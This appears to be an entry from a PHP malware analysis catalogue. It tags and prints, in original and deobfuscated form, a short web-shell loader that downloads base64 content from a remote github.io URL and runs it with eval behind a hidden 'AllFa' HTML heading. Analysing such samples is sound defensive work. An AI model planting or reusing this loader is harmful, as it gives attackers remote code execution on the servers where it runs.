PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
URLs
https://cavdar59.github.io/alfa
Execution
eval

Deobfuscated code

<?php

$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d);
eval("?>" . base64_decode($l3nin));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>

Original code

<?php
$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d); 
eval("?>".(base64_decode($l3nin)));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>